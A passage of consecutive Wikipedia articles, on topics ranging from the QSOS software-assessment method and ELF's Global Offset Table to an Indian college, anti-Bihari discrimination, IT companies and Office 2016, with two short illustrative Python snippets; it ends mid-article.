The Qualification and Selection of Open Source software (QSOS) is a methodology for assessing Free/Libre Open Source Software. This methodology is released under the GFDL license. General approach QSOS defines 4 steps that are part of an iterative process: 1 - Define and organise what will be assessed (common Open Source criteria and risks and technical domain specific functionalities), 2 - Assess the competing software against the criteria defined above and score these criteria individually, 3 - Qualify your evaluation by organising criteria into evaluation axes, and defining filtering (weightings, etc.) related to your context, 4 - Select the appropriate OSS by scoring all competing software using the filtering system designed in step 3. Output documents This process generates software assessing sheets as well as comparison grids. These comparison grids eventually assist the user to choose the right software depending on the context. These documents are also released under the free GNU FDL License. This allows them to be reused and improved as well as to remain more objective. Assessment sheets are stored using an XML-based format. Tools Several tools distributed under the GPL license are provided to help users manipulate QSOS documents: Template editor: QSOS XUL Template Editor Assessment sheets editors: QSOS XUL Editor QSOS Qt Editor QSOS Java Editor (under development) See also Open source software assessment methodologies Open Source Software Free Software External links Official QSOS website Community website for the QSOS project Free software culture and documents Maturity models
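Steps 3 and 4 of the process amount to applying context-specific weights to the individual criterion scores and then ranking the candidates by weighted total. The following Python sketch illustrates that idea; the criteria, weights and scores are invented for the example, and real data would come from the QSOS XML assessment sheets, where each criterion is scored on a 0–2 scale.

```python
# Illustrative sketch of QSOS steps 3-4: weight the criteria for a given context,
# then score and rank the competing software. All names and numbers are example data.

def weighted_score(scores: dict[str, int], weights: dict[str, float]) -> float:
    # Criteria without an explicit weight default to 1.0.
    return sum(weights.get(criterion, 1.0) * value for criterion, value in scores.items())

candidates = {
    "Software A": {"maturity": 2, "adoption": 1, "documentation": 2},
    "Software B": {"maturity": 1, "adoption": 2, "documentation": 1},
}
context_weights = {"maturity": 3.0, "adoption": 1.0, "documentation": 2.0}

ranking = sorted(candidates, reverse=True,
                 key=lambda name: weighted_score(candidates[name], context_weights))
for name in ranking:
    print(f"{name}: {weighted_score(candidates[name], context_weights):.1f}")
```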
2369152
https://en.wikipedia.org/wiki/Pune%20Institute%20of%20Computer%20Technology
Pune Institute of Computer Technology
Pune Institute of Computer Technology (or PICT) is a private unaided engineering college located in Dhankawadi, Pune, India. It was established by the Society for Computer Technology and Research (SCTR) in 1983. It offers degrees in Information Technology, Computer Engineering and Electronics and Telecommunication Engineering. Accreditation PICT has been accredited by India's two major accreditation agencies, the National Assessment and Accreditation Council (NAAC) and the National Board of Accreditation (NBA). Specializations and departments Computer Engineering Head of Department: M. S. Taklikar Undergraduate intake per year: 240 Postgraduate intake per year: 52 The Bachelor of Engineering program in Computer Engineering commenced from the academic year 1983–84. The department is known for its excellent results and student placements. There are 10 well-equipped laboratories in the department. The department pioneered postgraduate education in Computer Engineering among the unaided engineering colleges of the University of Pune, with the first batch commencing in 2000. There are two shifts in this program, the first consisting of 180 students and the second of 60 students. Electronics and Telecommunication Engineering Head of Department: Sandeep V. Gayakwaad Undergraduate intake per year: 240 This program also consists of two shifts, with 180 students in the first shift and 60 students in the second. Established in 1995, this department has a lab with around 25 Texas and Motorola experimental kits. The E&TC department won the "Best Department Award" in 2003 and 2004. In 2009–2010, the E&TC department had the highest MHT-CET cut-off in the University of Pune, at 178/200. Information Technology Engineering Head of Department: A. M. Bagade Undergraduate intake per year: 180 PICT's Bachelor of Engineering program in Information Technology began in 2001 with an intake capacity of 60 students. The current intake capacity is 180 students. It has a multimedia laboratory, an operating systems laboratory and a network laboratory, along with the programming and project laboratories. Degrees awarded The Bachelor of Engineering (B.E.) degree is offered in all the aforementioned departments. An M.E. degree is also offered by all departments. As PICT is affiliated with the University of Pune, the degrees are awarded by the university. Admissions The institute considers the MHT-CET and JEE-Main scores of students for admissions. Students who have successfully completed a diploma at a polytechnic institute are eligible for direct admission to the second year. It is considered one of the most selective institutes to get into. There are also programs for non-resident Indian (NRI) students at the college. Campus and buildings The campus is located in Dhankawadi, a suburb of southern Pune. It is a totally urban campus. The hallmark of the 4-acre campus is the central sprawling lawn in front of the main library, which is off limits to all students and teachers. The buildings in the campus are: Main building School of Management Canteen Boys hostel Girls hostel Workshop Guest House Main Building The main building is the largest building on the campus. It consists of the administrative wing, the Computer Engineering wing, the Electronics and Telecommunication wing, the IT wing and the main library. The building has classrooms, laboratories and staff rooms which are shared between the three undergraduate courses. The PICT library has a collection of books and subscriptions to journals. 
The library is accessible to students from 6 AM to 10 PM and is centrally located between the three academic wings. The whole of the main building has seamless Wi-Fi connectivity, except the Lecture Hall Complex. The boys' and girls' hostels have a combined capacity of 200 students and are located on the north of the campus. All the hostels have LAN facilities, which facilitate seamless learning. The cafeteria, serving mostly Indian cuisine, is situated between the two hostels. The PICT basketball court is situated adjacent to the girls' hostel building. There is also a Student Activity Center (SAC), which has facilities for student recreation. Extra-curricular activities Apart from academics, annual technical and cultural festivals are held, such as: Impetus and Concepts (INC 2014) PICT Robotics TEDxPICT Credenz - PICT IEEE Student Branch organized Scientia - PICT IET Student Chapter Pulzion - PICT ACM Student Chapter Abhivyaktee and Art Exhibition - PICT Art Circle. Cultural show by FE students. Addiction - Annual Cultural festival. Impetus and Concepts, popularly known as INC, was initiated in 1990 and soon reached a stage where it created national and international interest. It won acclaim, and industry stalwarts with vision recognized its importance and actively supported the event. Concepts is a national-level project competition, with students participating from colleges all over the country. Apart from technical events, PICT's annual cultural event, Addiction, also takes place during the month of January. PICT Art Circle With a record of winning the Best Organized Team award 11 times, PICT Art Circle is the official cultural group of PICT that represents the college at various cultural events such as Mood Indigo and participates in intercollegiate competitions such as Purushottam Karandak, Firodiya Karandak and Dajikaka Gadgil Karandak. PICT won the Purushottam Karandak in 2000 and 2015, along with numerous other prizes. At Firodiya Karandak 2019, it was second runner-up for the one-act play 'Naqaab', with awards such as Best Writer, Best Actor and Best Set, and won Best Organized Team for the third time, having previously won it in 2005 and 2017. Sports Basketball, volleyball, table tennis and football. Rankings PICT was ranked 8th on the list of the best engineering colleges in India by the Edu-Rand Rankings in 2016. The survey was done jointly by Edu, an Indian company, and the RAND Corporation, a non-profit American think tank. References External links Official website Review of PICT by students Inspection of Affiliated Colleges http://sppudocs.unipune.ac.in/sites/circulars/Affiliation%20Circulars/regarding-overall-deficiencies-and-observation-11-12-15.pdf Engineering colleges in Pune Savitribai Phule Pune University Educational institutions established in 1983 1983 establishments in Maharashtra
18982645
https://en.wikipedia.org/wiki/Anti-Bihari%20sentiment
Anti-Bihari sentiment
Anti-Bihari sentiment refers to discrimination against the migrant people of the Indian state of Bihar which is a state in the north-eastern Gangetic plains of the country. Bihar had slower economic growth than the rest of India in the 1990s which led to Biharis migrating to other parts of India in search of opportunities. Bihari migrant workers have been subject to a growing degree of hatred by the locals of those states because of their stereotyping as criminals. Moreover, the Biharis have been victimized due to the growing anti-Hindi imposition sentiment in non-Hindi states owing to the Central government agencies excluding regional languages in many national exams and services. Causes Since the late 1980s and through to 2005, poor governance and annual flooding of Bihar by the Kosi River (Sorrow of Bihar) contributed to a crisis in the Bihar economy. Corruption in regional politics and kidnappings of professional workers between 1990 and 2005 who spoke against the corruption contributed to an economic collapse and led to the flight of capital, middle class professionals, and business leaders to other parts of India. This flight of business and capital increased unemployment and this led to the mass migration of Bihari farmers and unemployed youth to more developed states of India. The state has a per capita income of $536 a year against India's average of $1470 and 30.6% of the state's population lives below the poverty line against India's average of 22.15%. The level of urbanisation (10.5%) is below the national average (27.78%). Urban poverty in Bihar (32.91%) is above the national average of 23.62%. Bihar has highest population density and lowest GDP in India. Also using per capita water supply as a surrogate variable, Bihar (61 litres per day) is below the national average (142 litres per day). Impact Economic Bihar has a per capita income of $536 a year against India's average of $1,470. Given this income disparity, migrant workers moved to better paid locations and offered to work at lower rates. For example, in Tamil Nadu inter-state migrant construction workers are paid about Rs. 300 to Rs. 400 a day against the minimum of Rs. 750 per day. After thousands of migrant workers left Nashik, industries were worried that their costs would increase through more expensive local workers. In an interview with the Times of India, Raj Thackeray, leader of the MNS said; "The city (Mumbai) cannot take the burden anymore. Look at our roads, our trains and parks. On the pipes that bring water to Mumbai are 40,000 huts. It is a security hazard. The footpaths too have been taken over by migrants. The message has to go to Bihar that there is no space left in Mumbai for you. After destroying the city, the migrants will go back to their villages. But where will we go then?". The strain to Mumbai's infrastructure through migration has also been commented by mainstream secular politicians. The Chief Minister, Vilasrao Deshmukh felt that unchecked migration had placed a strain on the basic infrastructure of the state. However, he has maintained and urged migrant Bihari workers to remain in Maharashtra, even during the height of the anti North Indian agitation. Sheila Dikshit, the Chief Minister of Delhi, said that because of people migrating from Bihar, Delhi's infrastructure was overburdened. She said, that "these people come to Delhi from Bihar but don't ever go back causing burden on Delhi's infrastructure." 
Violence India Maharashtra North Indian students, including students from Bihar, preparing for the railway entrance exam were attacked by supporters of Raj Thackeray's far-right MNS party in Mumbai on 20 October 2008. One student from Bihar was killed during the attacks. Four people were killed and another seriously injured in the violence that broke out in a village near Kalyan following the arrest of MNS chief Raj Thackeray. Bihar Chief Minister Nitish Kumar demanded action against the Maharashtra Navnirman Sena activists and full security for students. Nitish Kumar requested Maharashtra Chief Minister Vilasrao Deshmukh's intervention. Kumar directed the additional director general of police to contact senior police officials in Maharashtra and compile a report on Sunday's incident, and asked the home commissioner to hold talks with the Maharashtra home secretary to seek protection for people from Bihar. In 2003, the Shiv Sena alleged that of the 500 Maharashtrian candidates, only ten were successful in the Railways exams. 90 per cent of the successful candidates were alleged to be from Bihar. Activists from the Shiv Sena ransacked a railway recruitment office in protest against non-Marathis being among the 650,000 candidates set to compete for 2,200 railway jobs in the state. Eventually, after attacks on Biharis heading towards Mumbai for exams, the central government delayed the exams. It is noteworthy that leaders from Bihar, including Lalu Prasad Yadav and Ram Vilas Paswan, held the post of Minister for Railways for long periods. Raj Thackeray alleged that these ministers showed a preference for North Indian candidates. He also lauded the next Railway minister, Mamata Banerjee, for including regional languages in the Railway Recruitment Board exams, allowing a level playing field for Marathis and other non-Hindi speakers. North East states Biharis have sought work in many states that form part of North East India. There were significant communities in Assam, Nagaland, and Manipur. Biharis who come to work as labourers are frequently and especially targeted in Assam by ULFA militants. There is a fear amongst the local population that Bihari migrants will dominate and annihilate the regional culture and language. As with all migrations in history, this has created tensions with the local population, which has resulted in large-scale violence. In 2000 and 2003, anti-Bihari violence led to the deaths of up to 200 people, and created 10,000 internal refugees. Similar violent incidents have also taken place recently in Manipur and Assam. According to K. P. S. Gill, waves of xenophobic violence have swept across Assam repeatedly since 1979, targeting Bangladeshis, Bengalis, Biharis and Marwaris. Rajasthan On 13 May 2016, a student named Satyarth was beaten to death and another student was injured in an incident that occurred in Kota, Rajasthan. Regarding the event, BJP MLA Bhawani Singh Rajawat of Kota stated that "Students from Bihar, UP and Jharkhand are spoiling the atmosphere of city and they must be driven out of the city." The government in Rajasthan assured full protection to students from Bihar, after ragging incidents involving Bihari students in a private engineering college in Udaipur surfaced. Lalu Prasad Yadav and Ram Vilas Paswan flayed the attacks on Bihari students in Rajasthan, saying that the students were subjected to insult, torture and assault with sticks when they protested. 
Former chief minister Rabri Devi called upon the chief minister to take necessary action and assure the safety of the students. According to reports, several Bihari students were thrashed during the ragging. Gujarat In October 2018, there were incidents of attacks on Hindi-speaking migrants in Gujarat after the alleged rape of a 14-month-old child in a village near Himmatnagar in north Gujarat by a Bihari. The attacks triggered an exodus of the migrants. Controversial statements Editorial by Bal Thackeray Shiv Sena leader Bal Thackeray commented in the Shiv Sena newspaper Saamana on why Biharis are disliked outside the eastern states. He quoted part of a text message as the title of his article. The message suggests that Biharis bring diseases, violence, job insecurity, and domination, wherever they go. The text message says, "Ek Bihari, Sau Bimari. Do Bihari Ladai ki taiyari, Teen Bihari train hamari and paanch Bihari to sarkar hamaari" (One Bihari equals hundred diseases, Two Biharis is preparing for fight, Three Biharis it is a train hijack, and five Biharis will try to form the ruling Government). Nitish Kumar, the Chief Minister of Bihar, and the Union Railway Minister, Lalu Prasad Yadav, protested against the remark, demanding official condemnation of Bal Thackeray. Kumar, speaking to the press at Patna Airport, said, "If Manmohan Singh fails to intervene in what is happening in Maharashtra, it would mean only one thing – he is not interested in resolving the issue and that would not be good for the leader of the nation". Angered by Thackeray's insulting remark against the Bihari community, Rashtriya Janata Dal (RJD) activists burned an effigy of the Shiv Sena chief at Kargil Chowk in Patna and said that the senior Thackeray had completely lost his marbles and needed to be immediately committed to a mental asylum. Consequences Protests and demonstrations Angry students in various parts of Bihar disrupted train traffic, as protests continued against assaults on north Indians by MNS activists in Mumbai. Noted physician Dr Diwakar Tejaswi observed a day-long fast in Patna to protest against repeated violence against north Indians by Maharashtra Navnirman Sena (MNS) leader Raj Thackeray and his supporters. Various student organisations gave a call for a Bihar shutdown on 25 October 2008 to protest attacks on north Indian candidates by Maharashtra Navnirman Sena activists during a Railway recruitment examination in Mumbai. Various cases were filed in Bihar and Jharkhand against Raj Thackeray for assaulting the students. A murder case was also filed by Jagdish Prasad, father of Pawan Kumar, who was allegedly killed by MNS activists in Mumbai. Mumbai police, however, claimed it was an accident. Bihar Chief Minister Nitish Kumar announced a compensation of Rs 1,50,000 to Pawan's family. Bihar state Congress chief, Anil Kumar Sharma, demanded the enactment of an Act by Parliament for closing opportunities to any political party or organisation that indulges in obscurantism and raises narrow, chauvinistic issues based on regionalism to capture power. A murder case was also lodged against Raj Thackeray and 15 others in a court in Jharkhand on 1 November 2008 following the death of a train passenger the previous month in Maharashtra. According to the Dhanbad police, their Mumbai counterparts termed Sakaldeo's death an accident. According to social scientist Dr. 
Shaibal Gupta, the beating of students from Bihar has consolidated Bihari sub-nationalism. Rahul Raj Rahul Raj, from Patna, was shot dead aboard a bus in Mumbai by the police on 27 October 2008. Rahul was 23 years old and was brandishing a pistol; although he was not shooting at the public, the police regarded him as a major threat to public security. The Mumbai police alleged that he wanted to assassinate Raj Thackeray. Nitish Kumar questioned the police action, but R R Patil justified it. It was alleged that Rahul was protesting against the attacks on Bihari and Uttar Pradeshi candidates appearing for railway examinations. The Mumbai crime branch looked into the incident. During Rahul's funeral, slogans of "Raj Thackeray murdabad" and "Rahul Raj amar rahe" were heard. Despite the Mumbai police's allegations, there was high-level government representation at the funeral. Bihar Deputy CM Sushil Kumar Modi and PHED minister Ashwini Kumar Chaubey represented the state government at the cremation, which was also attended by Patna MP Ram Kripal Yadav. The bier was carried by Rahul's friends even though the district administration had arranged a flower-bedecked truck for the purpose. Attacks against Marathis After the October 2008 anti-Bihari attacks in Maharashtra, members of the Bharatiya Bhojpuri Sangh (BBS) vandalised the official residence of Tata Motors Jamshedpur plant head S.B. Borwankar, a Maharashtrian. Armed with lathis and hockey sticks, more than 100 BBS members trooped to Borwankar's Nildih Road bungalow around 3.30 pm. Shouting anti-MNS slogans, they smashed windowpanes and broke flowerpots. BBS president Anand Bihari Dubey called the attack on Borwankar's residence unfortunate, and said that he knew BBS members were angry after the attacks in Maharashtra on Biharis, but did not expect such a reaction. Fear of further violence gripped the 4,000-odd Maharashtrian settlers living in and around the city. Two air-conditioned bogies of the train Vikramshila Express – reportedly with Maharashtrian passengers on board – were set on fire in the Barh area of Bihar. Hundreds of slogan-shouting students surrounded Barh railway station in rural Patna demanding that MNS leader Raj Thackeray be tried for sedition. No one was reported injured, and passengers fled as soon as the attackers started setting the bogies on fire. In another incident, a senior woman government official in Bihar, with the surname Thackeray, was the target of an angry mob that surrounded her office and shouted slogans against her in Purnia district. Ashwini Dattarey Thackeray was the target of a mob of over 200 people. The mob, led by a local leader of the Lok Janashakti Party, surrounded Thackeray's office in Purnia, about 350 km from Patna, and shouted slogans like "Go back Maharashtrians" and "Officer go back, we do not need your services". A gang of 25 people pelted stones at the Maharashtra Bhawan in Khalasi Line, Kanpur, Uttar Pradesh. Constructed in 1928, the building is owned by the lone trust run by Marathis in Kanpur. It has served as an important venue for prominent festivals, including Ganesh Utsav and Krishna Janmastami. On 29 October, in Ghaziabad, Marathi students at Mahanand Mission Harijan PG College were attacked, allegedly by an Uttar Pradesh student leader and his friends. Police sources in Ghaziabad confirmed the victims stated in their FIR that the attackers "mentioned Rahul Raj and Dharam Dev" while kicking them in their hostel rooms. A group of 20 youths, from Bihar, attacked Maharashtra Sadan in the capital on 3 November. 
The Rashtrawadi Sena has claimed responsibility for the attack. They ransacked the reception of the building and raised slogans against Raj Thackeray. Bhojpuri film industry relocation The Rs 200-crore Bhojpuri film industry is considering moving out of Mumbai owing to threats from MNS workers, and growing insecurity. With an average output of 75 movies per annum and an over 250 million target audience, the Bhojpuri film industry employs hundreds of unskilled and semi-skilled people from the state in various stage of production and distribution. The industry, which has around 50 registered production houses in Mumbai, has initiated talks with Uttar Pradesh and Bihar. "We have given a proposal to the Uttar Pradesh government through its Culture Minister Subhash Pandey for setting up the industry in Lucknow. Besides, we are also counting on some other options like Delhi, Noida and Patna," Bhojpuri superstar and producer Manoj Tiwari said. The films have a large market because the Bhojpuri diaspora is spread over countries like Mauritius, Nepal, Dubai, Guyana, West Indies, Fiji, Indonesia, Surinam and the Netherlands. 70 per cent of the total production cost of a Bhojpuri film — budgets of which range from Rs 80 lakh to Rs 1.25 crore — is usually spent in Maharashtra, providing direct employment to junior artists, make-up men, spot boys and local studios among others. Improving Bihar However, the state government, post 2005, has made an effort to improve the economic condition of the state, and reduce the need for migration. In 2008, the state government approved over Rs 70,000 crore worth of investment, has had record tax collection, broken the political-criminal nexus, made improvements in power supply to villages, towns and cities. Bihar, a state fraught with abject poverty, has come out on top as the fastest growing state second year in a row, with a striking 13.1 percent growth in 2011–2012. Its economy has also grown bigger than that of Punjab — the prime destination for Bihari workers. They have laid greater emphasis on education and learning by appointing more teachers, and opening a software park. State Ministers who have failed to live up to election commitments have been dismissed. Bihar's GSDP grew by 18% over the period 2006–2007, which was higher than in the past 10 years and one of the highest recorded by the Government of India for that period. Other consequences Since November 2005, there has been a significant fall in the number of migrant workers in many parts of India. After the early 2008 migrant crisis and bombing of the Bhojpuri cinema hall in Punjab, Biharis have decided to stay away from states of the North East and Punjab. Culturally, Biharis appear to have rejected a film based heavily on Punjabi culture. In August 2008, a film called Singh Is Kinng starring Akshay Kumar which was a superhit in India, flopped in Bihar. Bihar has been where Akshay Kumar's films, from Jaanwar to Hey Babyy, have acquired a blockbuster status. In this case, the heavy usage of Punjabi language, culture was said to be the main cause of the movie being rejected by Bihari audiences. See also 2008 attacks on North Indians in Maharashtra Anti-India sentiment Permanent Settlement Ethnic relations in India References Discrimination in India Muhajir history Racism in India
11503950
https://en.wikipedia.org/wiki/Synnex
Synnex
Synnex Corporation is an American multinational corporation that provides B2B IT services. It was founded in 1980 by Robert T. Huang and based in Fremont, California. As an information technology supply chain services company, it offers services to original equipment manufacturers, software publishers and reseller customers. History Originally founded as a technology hardware distributor, Synnex distributes products and related logistics services. As a business process outsourcing and contract assembly provider, it works with industry suppliers of IT systems, peripherals, system components, software and networking equipment. The company is one of the major employers in Greenville, South Carolina. On 21 December 2009, Synnex acquired Jack of All Games from Take-Two Interactive. In December 2010, Synnex acquired the managed business solutions division of e4e, an ITeS service provider located in Bangalore, India. In 2012, Hyve Solutions announced a partnership with IBM and Zettaset to produce a bundled "turnkey" platform for Hadoop-based analytics targeted to the needs of small- and medium-sized businesses. Synnex acquired IBM's worldwide customer care business process outsourcing (BPO) services business on 11 September 2013. On 28 June 2018, Convergys and Synnex announced they had reached a definitive agreement in which Synnex would acquire Convergys for $2.43 billion in combined stock and cash, and integrate it with Concentrix. On 5 October 2018, Convergys Corporation and Synnex announced that they had completed the merger. In 2019, Synnex was ranked number 158 on the Fortune 500 list. On 9 January 2020, Dennis Polk, President and Chief Executive Officer of Synnex, announced plans to separate Synnex and Concentrix into two publicly traded companies. The spinoff was completed on 1 December 2020, with Synnex shareholders getting one share of Concentrix for each share of Synnex they held. In July 2021, the Republican National Committee's servers were hacked through Synnex. The company said it "could potentially be in connection" with the Kaseya VSA ransomware attack that unfolded days prior. On 22 March 2021, it was announced that Synnex would merge with Tech Data in a transaction valued at 7.2 billion USD, including debt. Synnex shareholders would receive 55% of the merged company. MiTAC Holdings Corp. and its affiliates, which collectively owned about 17% of Synnex shares as of 22 January 2021, agreed to vote their shares in favor of the transaction. Merger with Tech Data On September 1, 2021, Synnex completed its merger with Tech Data. The merger created a new company with $59.8 billion in revenue, TD Synnex. Through the combination of both companies, TD Synnex became the largest IT distributor, surpassing Ingram Micro. TD Synnex is led by former Tech Data CEO Rich Hume. References Companies listed on the New York Stock Exchange Consulting firms established in 1980 Companies based in Fremont, California Information technology consulting firms of the United States International information technology consulting firms Outsourcing companies American companies established in 1980 Technology companies established in 1980 2021 mergers and acquisitions
53931502
https://en.wikipedia.org/wiki/Global%20Offset%20Table
Global Offset Table
The Global Offset Table, or GOT, is a section of a computer program's memory (in executables and shared libraries) used to enable code compiled as an ELF file to run correctly, independent of the memory address where the program's code or data is loaded at runtime. It maps symbols in the program code to their corresponding absolute memory addresses to facilitate Position Independent Code (PIC) and Position Independent Executables (PIE), which are loaded to a different memory address each time the program is started. The runtime (absolute) memory addresses of variables and functions are unknown before the program is started when PIC or PIE code is run, so they cannot be hardcoded during compilation by the compiler. The Global Offset Table is represented as the .got and .got.plt sections in an ELF file, which are loaded into the program's memory at startup. The operating system's dynamic linker updates the Global Offset Table relocations (mapping symbols to absolute memory addresses) at program startup or lazily as symbols are first accessed. It is the mechanism that allows shared libraries (.so) to be relocated to a different memory address at startup, avoiding memory address conflicts with the main program or other shared libraries, and that helps harden computer program code against exploitation. References Computer programming
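As a concrete illustration, the sketch below locates the .got and .got.plt sections of an ELF binary and reports where they are loaded and roughly how many entries they hold. It assumes the third-party pyelftools package is available; the default binary path is only an example.

```python
# Sketch: report the location and size of a binary's GOT sections.
# Requires the third-party pyelftools package (pip install pyelftools).
import sys
from elftools.elf.elffile import ELFFile

def dump_got(path: str) -> None:
    with open(path, "rb") as f:
        elf = ELFFile(f)
        for name in (".got", ".got.plt"):
            section = elf.get_section_by_name(name)
            if section is None:
                continue  # the section may be absent or merged, depending on the linker
            addr = section["sh_addr"]
            size = section["sh_size"]
            # Fall back to the pointer size when sh_entsize is not recorded.
            entsize = section["sh_entsize"] or (8 if elf.elfclass == 64 else 4)
            print(f"{name}: loaded at {addr:#x}, {size // entsize} entries of {entsize} bytes")

if __name__ == "__main__":
    dump_got(sys.argv[1] if len(sys.argv) > 1 else "/bin/ls")
```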
25764801
https://en.wikipedia.org/wiki/2007%20Troy%20Trojans%20football%20team
2007 Troy Trojans football team
The 2007 Troy Trojans football team represented Troy University in the 2007 NCAA Division I FBS football season. The Trojans played their home games at Movie Gallery Stadium in Troy, Alabama and competed in the Sun Belt Conference. The Trojans were co-champions of the conference with Florida Atlantic, winning their second title in a row. Troy was coming off an 8–5 record in 2006. Schedule Rankings Coaching staff Larry Blakeney – Head Coach Shayne Wasden – Assistant Head Coach Tony Franklin – Offensive Coordinator/Quarterbacks Jeremy Rowell – Defensive Coordinator/Secondary Randy Butler – Defensive Ends/Recruiting Coordinator Maurea Crain – Defensive Line Neal Brown – Inside Receivers Benjy Parker – Linebackers John Schlarman – Offensive Line Chad Scott – Running Backs Richard Shaughnessy – Strength and Conditioning References Troy Trojans Troy Trojans football seasons Sun Belt Conference football champion seasons Troy Trojans football
11259524
https://en.wikipedia.org/wiki/ComputerWare
ComputerWare
ComputerWare: The MacSource was a chain of ten Macintosh-only retail stores in the greater San Francisco Bay Area of Northern California founded by Karim Khashoggi and Drew Munster. At one time, they were the largest Macintosh-only reseller in the United States. Guy Kawasaki mentions ComputerWare a number of times in his book, The Macintosh Way. Besides the ten stores, ComputerWare also had a headquarters that held international, direct, and corporate sales departments, and at one time had a full hardware repair depot and various training centers around the Bay Area. History The first ComputerWare store was opened on California Avenue in Palo Alto in 1985 by Drew Munster and Karim Khashoggi. They later hired Derek Van Atta as store manager. ComputerWare was originally incorporated as Lightning Development, doing business as ComputerWare; later the corporation was reorganized as ComputerWest dba ComputerWare after David Lipson bought the company from the original founders. The Corporate Sales department was formed in 1987. In 1988 a separate headquarters was set up at 2800 West Bayshore Avenue in Palo Alto to house administrative, hardware repair, Corporate Sales, and other departments that were outgrowing the floor above the Palo Alto retail storefront. In May 1989, ComputerWare expanded to two stores with the opening of their Sunnyvale store on Lawrence Expressway near Fry's Electronics. Then three more stores were opened in rapid succession: the San Francisco store was opened in November in the heart of the financial district. Stores 4 and 5 were opened in December 1989 through the acquisitions of MacOrchard in Berkeley and the Computer Center of Santa Cruz. August 1990 brought a sixth store in San Rafael through the acquisition of MacGarden. This location was still in the Macintosh-only retail business as the Marin Mac Shop until mid-2010, when it closed. Two new stores opened in 1992: a seventh store was opened in Dublin in October, and then in November store number eight opened in Sunnyvale on El Camino Real through the acquisition of MacShop. The hardware repair depot was moved out into its own building, across 101 on East Bayshore from the corporate headquarters, in 1993. 1994 brought about the last store openings, building the ComputerWare retail chain to its height of ten stores. The San Mateo location opened in March on El Camino Real, and the Walnut Creek store was opened in December. April of that same year also brought about the move of one of the two Sunnyvale stores (the El Camino MacShop location) to Santa Clara, thereby solidifying full Bay Area coverage. In November 1995 the lease ran out on the Palo Alto headquarters location, and a larger facility that could house the headquarters, warehouse, and hardware repair depot was found at 605 West California Avenue in Sunnyvale. ComputerWare UK ComputerWare UK, a distribution business in the UK, was founded in 1992, and although some of its products are Apple compatible, such as trackballs with large buttons and a large ball, it has no connection to the defunct American retail chain. ComputerWare UK was founded by Rik and Christeen Alexander in order to provide computer input device solutions and test equipment through manufacturers, system integrators, value-added resellers and PC builders. The business objectives included never employing people and never selling software or services, although ComputerWare UK acts as an appointed agent on behalf of companies in the Middle East and Africa. Rik and Christeen are members of the Finchampstead Cricket Club. 
Apple authorization In November 1991, Apple fully authorized all of the ComputerWare stores as Apple Authorized Dealers; before this time, only the Santa Cruz store was an authorized dealer, limiting the other stores to software, third-party hardware, cables, and other accessories. After this date, ComputerWare was able to carry the full line of Apple Macintosh products directly from Apple. In January 1997, ComputerWare received Apple Specialist Authorization from Apple Computer for its dedication to the Macintosh platform. The downfall In April 2001, ComputerWare announced that it was closing its doors. A number of factors led to the demise of the ComputerWare retail chain. One of the major factors was the owner's loss of faith in Apple as Apple began to open its own stores. The owner, David Lipson, looked for a way to sell the company, and when a last-minute deal fell through, put the entire chain into close-out and liquidated the assets. The reincarnation Elite Computers & Software bought the rights to the ComputerWare name and other assets in June 2001 and reopened four of the original ComputerWare stores later that year. These stores, located in Capitola, Sunnyvale, Berkeley and San Rafael, were staffed with many of the same employees, store managers and retail managers from the old ComputerWare. The four reopened stores were rebranded as ComputerWare by Elite Computers & Software and became the company's expanded retail division, which grew from one to five retail stores in late 2001. The second downfall A number of factors led to the 2003 closing of the four reopened ComputerWare stores, then branded ComputerWare by Elite Computers & Software, as well as the original Elite Computers & Software store located directly across the street from Apple's worldwide headquarters in Cupertino. Pressure from multiple new Apple-owned retail stores opened or planned near existing ComputerWare by Elite Computers & Software stores, perceived favoritism toward Apple-owned stores in new-product launch allocations, and changes by Apple to its Apple Authorized Dealer contracts all contributed to the store closures. Elite Computers & Software, which owned and subsequently closed the five ComputerWare by Elite Computers & Software stores, along with a growing number of Apple Authorized Dealers throughout the United States, had become unhappy with what the dealers perceived as unfair treatment and unfair competition by Apple Computer, the dealers' and Apple Specialists' only computer supplier. This resulted in a number of Apple dealers and Apple Specialists either closing or filing lawsuits against Apple Computer. Most of these dealers were designated as Apple Specialists and sold only Apple Macintosh computers, making the conflict a matter of survival for their stores and businesses. The San Rafael store The San Rafael (Marin) store location was reopened for a third time in 2004 under new ownership, first under the name C3 Computing Corp and later as The Marin Mac Shop. Still very much like the original ComputerWare, the location remained a Macintosh-only storefront until The Marin Mac Shop closed its doors in May 2010. 
See also External Links and Sources ComputerWare Alumni Internet Wayback Archive of MacSource.com Internet Wayback Archive of ComputerWare.com CNET News, April 3, 2001 Apple Retailer ComputerWare Closes CNET News, September 10, 2001 ComputerWare Stores to Reopen Silicon Valley/San Jose Business Journal, April 4, 2003 Macintosh Retailer Files Suit, Says Apple Deal Turned Sour References American companies established in 1985 American companies disestablished in 2001 Apple Specialists Companies based in Sunnyvale, California Computer companies established in 1985 Computer companies disestablished in 2001 Defunct companies based in the San Francisco Bay Area Defunct computer companies of the United States
45187572
https://en.wikipedia.org/wiki/Microsoft%20Office%202016
Microsoft Office 2016
Microsoft Office 2016 (First perpetual release of Office 16) is a version of the Microsoft Office productivity suite, succeeding both Office 2013 and Office for Mac 2011 and preceding Office 2019 for both platforms. It was released on macOS on July 9, 2015, and on Microsoft Windows on September 22, 2015, for Office 365 subscribers. Mainstream support ended on October 13, 2020, and extended support for most editions of Office 2016 will end on October 14, 2025, the same day as Windows 10. The perpetually licensed version on macOS and Windows was released on September 22, 2015. Office 2016 requires Windows 7 SP1, Windows Server 2008 R2 SP1 or OS X Yosemite or later. It is the last version of Microsoft Office to support Windows 7, Windows 8, early versions of Windows 10 (1803 and earlier) and the respective server releases, as the following version, Microsoft Office 2019 only supports Windows 10 version 1809 or later and Windows Server 2019. New features Windows New features in the Windows release include the ability to create, open, edit, save, and share files in the cloud straight from the desktop, a new search tool for commands available in Word, PowerPoint, Excel, Outlook, Access, Visio and Project named "Tell Me", more "Send As" options in Word and PowerPoint, and co-authoring in real time with users connected to Office Online. Other smaller features include insights, a feature powered by Bing to provide contextual information from the web, a Designer sidebar in PowerPoint to optimize the layout of slides, more new chart types and templates in Excel (such as treemap, sunburst chart (also known as a ring chart), waterfall chart, box plot and histogram, and financial and calendar templates), new animations in PowerPoint (such as the Morph transition), the ability to insert online video in OneNote, enhanced support for attachments for emails in Outlook (supporting both locally-stored files and files on OneDrive or SharePoint), a Groups feature for Outlook, and a data loss prevention feature in Word, Excel, and PowerPoint. Microsoft Office 2016 is the first in the series to support the vector graphic format SVG. Microsoft Office 2016 cannot coexist with Microsoft Office 2013 apps if both editions use Click-To-Run installer, but it can coexist with earlier versions of Microsoft Office, such as 2003, 2007, and 